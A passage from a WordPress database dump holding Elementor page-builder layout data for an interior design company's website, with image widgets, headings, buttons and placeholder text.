flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3371,4785,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3372,4785,'_elementor_pro_version','3.8.1'),(3373,4785,'_elementor_css','a:6:{s:4:\"time\";i:1685012084;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3374,4786,'_wp_page_template','elementor_header_footer'),(3375,4786,'_elementor_edit_mode','builder'),(3376,4786,'_elementor_template_type','wp-page'),(3377,4786,'_elementor_version','3.8.1'),(3378,4786,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad 